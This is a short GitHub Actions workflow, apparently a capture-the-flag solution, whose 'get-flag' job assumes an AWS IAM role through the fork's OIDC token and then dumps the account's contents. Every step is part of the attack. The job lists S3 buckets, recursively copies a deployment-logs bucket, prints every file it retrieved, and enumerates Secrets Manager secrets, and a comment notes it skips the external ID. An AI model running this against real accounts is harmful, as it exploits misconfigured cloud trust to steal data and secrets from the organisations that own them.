name: Fork

on:
  workflow_dispatch:
  push:

permissions:
  id-token: write
  contents: read

jobs:
  get-flag:
    runs-on: ubuntu-latest
    steps:
      - name: Assume Role from Fork
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::170974506515:role/prod-readonly-auditor
          aws-region: us-west-2
          # Try without external-id first since fork might not need it

      - name: Get Flag
        run: |
          aws sts get-caller-identity
          aws s3 ls
          aws s3 ls s3://ci-deployment-logsv1/ --recursive
          aws s3 cp s3://ci-deployment-logsv1/ . --recursive
          find . -type f -exec cat {} \;
          aws secretsmanager list-secrets
